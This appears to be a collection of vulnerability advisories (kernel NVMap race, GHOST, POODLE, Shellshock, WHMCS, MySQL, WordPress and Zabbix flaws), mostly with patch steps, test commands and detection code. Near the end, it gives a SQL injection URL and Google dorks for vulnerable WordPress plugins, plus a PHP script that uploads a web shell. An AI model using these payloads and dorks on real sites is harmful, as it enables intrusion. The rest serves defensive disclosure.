
Linux Kernel memory use risk – CVE-2014-5332

Race condition in NVMap in NVIDIA Tegra Linux Kernel 3.10 allows local users to gain privileges via a crafted NVMAP_IOC_CREATE IOCTL call, which triggers a use-after-free error, as demonstrated by using a race condition to escape the Chrome sandbox.

Weakness classification

  • CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’)

Timeline

August 18, 2014 MITRE reserved CVE
February 6, 2015 NVD published advisory

Affected products

  • Linux Kernel 3.10



GHOST: glibc vulnerability (CVE-2015-0235)

Background Information

GHOST is a ‘buffer overflow’ bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application.

Impact

The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.
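As an added local check that is not part of the original advisory: a C probe modelled on the publicly released GHOST test program. It hands gethostbyname_r() an all-digit name whose length makes the unfixed glibc size calculation exactly fill the supplied buffer, and watches a canary placed right after that buffer; the function name ghost_probe() and the three result codes are this example's own.

```c
#define _GNU_SOURCE            /* gethostbyname_r() is a GNU/BSD extension */
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

#define CANARY "in_the_coal_mine"

/* Result buffer for gethostbyname_r(), immediately followed by a canary.
 * An unpatched glibc writes one pointer (h_alias_ptr) past the end of the
 * buffer, which lands on the canary. */
static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} probe = { "buffer", CANARY };

enum { GHOST_NOT_VULNERABLE = 0, GHOST_VULNERABLE = 1, GHOST_INCONCLUSIVE = 2 };

/* Runs the probe once and classifies the libc mapped into this process. */
int ghost_probe(void)
{
    struct hostent resbuf, *result = NULL;
    int herrno = 0;
    char name[sizeof(probe.buffer)];

    /* An all-digit name is treated as a numeric address and copied into the
     * caller's buffer without any DNS traffic, so the check runs offline.
     * Its length makes the pre-fix size calculation (16-byte address +
     * two pointers + name + NUL) exactly fill the buffer; the fix adds the
     * missing sizeof(h_alias_ptr) and rejects the request instead. */
    size_t len = sizeof(probe.buffer) - 16 - 2 * sizeof(char *) - 1;
    memset(name, '0', len);
    name[len] = '\0';
    memcpy(probe.canary, CANARY, sizeof(CANARY));   /* reset between calls */

    int rc = gethostbyname_r(name, &resbuf, probe.buffer, sizeof(probe.buffer),
                             &result, &herrno);
    if (strcmp(probe.canary, CANARY) != 0)
        return GHOST_VULNERABLE;        /* canary clobbered: the overflow happened */
    if (rc == ERANGE)
        return GHOST_NOT_VULNERABLE;    /* fixed glibc: buffer judged too small */
    return GHOST_INCONCLUSIVE;          /* not glibc, or another code path */
}

int main(void)
{
    static const char *verdict[] = { "not vulnerable", "VULNERABLE", "inconclusive" };
    printf("GHOST (CVE-2015-0235) local probe: %s\n", verdict[ghost_probe()]);
    return 0;
}
```

The probe only reports on the glibc mapped into its own process, so a service started before the package update keeps the old copy until it is restarted, which is why the restart step in the Resolution section matters.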

A list of affected Linux distros

  • RHEL (Red Hat Enterprise Linux) version 5.x, 6.x and 7.x
  • CentOS Linux version 5.x, 6.x & 7.x
  • Ubuntu Linux version 10.04, 12.04 LTS
  • Debian Linux version 7.x
  • Linux Mint version 13.0
  • Fedora Linux version 19 or older
  • SUSE Linux Enterprise 11 and older (also OpenSuse Linux 11 or older versions).
  • SUSE Linux Enterprise Software Development Kit 11 SP3
  • SUSE Linux Enterprise Server 11 SP3 for VMware
  • SUSE Linux Enterprise Server 11 SP3
  • SUSE Linux Enterprise Server 11 SP2 LTSS
  • SUSE Linux Enterprise Server 11 SP1 LTSS
  • SUSE Linux Enterprise Server 10 SP4 LTSS
  • SUSE Linux Enterprise Desktop 11 SP3
  • Arch Linux glibc version <= 2.18-1

Resolution

Update the glibc and nscd packages on your system using:

Fix for CentOS/RHEL/Fedora 5, 6, 7:

  • yum update glibc
  • Restart ALL running services, or reboot the server as an alternative.

Fix for Ubuntu:

  • sudo apt-get clean
  • sudo apt-get update
  • sudo reboot

The POODLE Attack – SSL 3.0 Protocol Vulnerability (CVE-2014-3566)

Systems Affected

All systems and applications utilizing the Secure Socket Layer (SSL) 3.0 with cipher-block chaining (CBC) mode ciphers may be vulnerable. However, the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack demonstrates this vulnerability using web browsers and web servers, which is one of the most likely exploitation scenarios.

Solution

There is currently no fix for SSL 3.0 itself, as the issue is fundamental to the protocol; disabling SSL 3.0 support in system and application configurations is the most viable solution currently available.

** Updates available: RHEL/CentOS/RPM based OS:

yum -y update openssl

** You MUST disable SSLv3 in all services that use it (httpd, mail, etc.). The update only prevents the downgrade; the protocol itself is still vulnerable.


Shellshock vulnerability (CVE-2014-6271, CVE-2014-7169)

This vulnerability (CVE-2014-6271) could allow arbitrary code execution. Certain services and applications allow remote, unauthenticated attackers to supply environment variables, which lets them exploit this issue.
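The service-side view of that attack surface, as an added example that is not from the original advisory: a CGI gateway copies request headers into environment variables, so a defender can flag any header whose value begins with Bash's function-export marker `() {`. The function name, the sample requests and the header-name output are this example's own constructions.

```c
/* Request-side Shellshock check. A CGI gateway exports request headers as
 * environment variables (HTTP_USER_AGENT, HTTP_COOKIE, ...), so a header
 * value that begins with Bash's function-export marker is what to alert on. */
#include <stddef.h>
#include <string.h>

#define SHELLSHOCK_MARKER "() {"

/* Scans a raw HTTP request (CRLF line endings). Returns 1 if any header value
 * starts with the marker and copies that header's name into `hdr`
 * (NUL-terminated, at most hdrlen-1 bytes, hdrlen > 0); returns 0 otherwise. */
int shellshock_scan_request(const char *req, char *hdr, size_t hdrlen)
{
    const size_t mlen = strlen(SHELLSHOCK_MARKER);
    const char *eol = strstr(req, "\r\n");
    if (eol == NULL)
        return 0;                           /* no header block at all */
    const char *line = eol + 2;             /* skip the request line */
    while (*line != '\0' && strncmp(line, "\r\n", 2) != 0) {
        eol = strstr(line, "\r\n");
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        const char *colon = memchr(line, ':', len);
        if (colon != NULL) {
            const char *v = colon + 1, *end = line + len;
            while (v < end && (*v == ' ' || *v == '\t'))
                v++;                        /* HTTP parsing drops leading blanks; Bash sees "() {" */
            if ((size_t)(end - v) >= mlen && memcmp(v, SHELLSHOCK_MARKER, mlen) == 0) {
                size_t nlen = (size_t)(colon - line);
                if (nlen >= hdrlen)
                    nlen = hdrlen - 1;
                memcpy(hdr, line, nlen);
                hdr[nlen] = '\0';
                return 1;
            }
        }
        if (eol == NULL)
            break;
        line = eol + 2;
    }
    return 0;
}

/* Constructed sample requests: one carrying the advisory's own test string in
 * User-Agent, one ordinary browser request. */
static const char SAMPLE_HIT[] =
    "GET /cgi-bin/status HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: () { :;}; echo vulnerable\r\n\r\n";
static const char SAMPLE_CLEAN[] =
    "GET /cgi-bin/status HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n";
```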

You can also manually test your version of Bash by running the following command:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"

If the output of the above command contains a line containing only the word vulnerable, you are using a vulnerable version of Bash. The patch used to fix this issue ensures that no code is allowed after the end of a Bash function.

Note that different Bash versions will also print different warnings while executing the above command. The Bash versions without any fix produce the following output:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
vulnerable
bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'
bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
bash: error importing function definition for `BASH_FUNC_x'
test

The versions with only the original CVE-2014-6271 fix applied produce the following output:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
bash: error importing function definition for `BASH_FUNC_x()'
test

The versions with additional fixes from RHSA-2014:1306, RHSA-2014:1311 and RHSA-2014:1312 produce the following output:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
test

The difference in the output is caused by additional function processing changes explained in the “How does this impact systems” section below.

The fix for CVE-2014-7169 ensures that the system is protected from the file creation issue. To test if your version of Bash is vulnerable to CVE-2014-7169, run the following command:

$ cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
bash: x: line 1: syntax error near unexpected token `='
bash: x: line 1: `'
bash: error importing function definition for `x'
Fri Sep 26 11:49:58 GMT 2014

If your system is vulnerable, the time and date information will be output on the screen and a file called /tmp/echo will be created.

If your system is not vulnerable, you will see output similar to:

$ cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
date
cat: /tmp/echo: No such file or directory

If your system is vulnerable, you can fix these issues by updating to the most recent version of the Bash package by running the following command:

# yum update bash

WHMCS SQL injection Exploit

** A patch was released. See http://blog.whmcs.com/?t=80223  

WHMCS, a popular billing/support/customer management system, is still suffering from critical SQL injection issues. Today, yet another vulnerability, including an exploit, was released.

Due to the fact that there is no patch available at this point, I will refrain from linking to any exploit details, but it is pretty trivial to find the respective blog post which includes a script to exploit the vulnerability. WHMCS acknowledged the problem.

The root cause of this problem, as well as prior problems with the software, appears to be a lack of understanding of proper controls to prevent SQL injection. Good input validation is just a start, but prepared statements are a must. Instead, the WHMCS developers used a rather complex (and buggy) function to escape user input and assemble dynamic SQL queries.

The bug is in a function used throughout WHMCS, so the exploit is not limited to a particular URL.

http://blog.whmcs.com/?t=80206


Multiple vulnerabilities mysql – Mandriva

  Problem Description:
  Multiple vulnerabilities have been discovered and corrected in mysql:
  Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown
  impact and attack vectors related to a Security Fix, aka Bug
  #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of
  20120816, Oracle has not commented on this possibility (CVE-2012-2750).
  Unspecified vulnerability in the MySQL Server component in Oracle
  MySQL 5.1.70 and earlier, 5.5.32 and earlier, and 5.6.12 and earlier
  allows remote authenticated users to affect availability via unknown
  vectors related to Optimizer (CVE-2013-3839).
  The updated packages have been upgraded to the 5.1.72 version which
  is not vulnerable to these issues.
  _______________________________________________________________________
  References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2750
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3839
  http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
  http://dev.mysql.com/doc/relnotes/mysql/5.1/en/news-5-1-72.html
  _______________________________________________________________________
  Updated Packages:
  _______________________________________________________________________
  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
  of md5 checksums and GPG signatures is performed automatically for you.
  All packages are signed by Mandriva for security.  You can obtain the
  GPG public key of the Mandriva Security Team by executing:
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
  You can view other update advisories for Mandriva Linux at:
  http://www.mandriva.com/en/support/security/advisories/

WordPress WP Realty Plugin – Blind SQL Injection

# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]

Zabbix 2.0.8 SQL Injection and Remote Code Execution

This exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower.  The SQL injection issue can be abused in order to retrieve an active session ID.  If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.


WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability

An arbitrary file upload web vulnerability has been detected in the CodeCanyon WordPress plugin Complete Gallery Manager v3.3.3.

The vulnerability allows remote attackers to upload files via the POST method with multiple extensions and then access them without authorization on the
application side of the service.
The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path, when the upload-images.php file processes an upload of
attacker-controlled content or web shells. After the upload, the remote attacker can access the file under one extension and swap it for the
other one to execute, for example, PHP code.
Exploitation of the vulnerability requires no user interaction and no privileged application user account (no password needed).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
                [+] CodeCanyon - Complete Gallery Manager
Vulnerable Module(s):
                [+] Image File Upload
Vulnerable File(s):
                [+] upload-images.php
Affected Module(s):
                [+] Application Index Listing (http://localhost:8000/)
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...
Vuln page :
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Exploit :
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php
Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/
Reference(s):
http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Risk:
=====
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).

WordPress Lazy SEO plugin Shell Upload Vulnerability

This plugin can be exploited to upload a malicious shell to the account, which poses risks to the account itself and to the whole server as well. The weakness lies within the lazyseo.php file, as it lacks the appropriate authentication and input validation. An upgrade has been released by the vendor, and upgrading is highly recommended.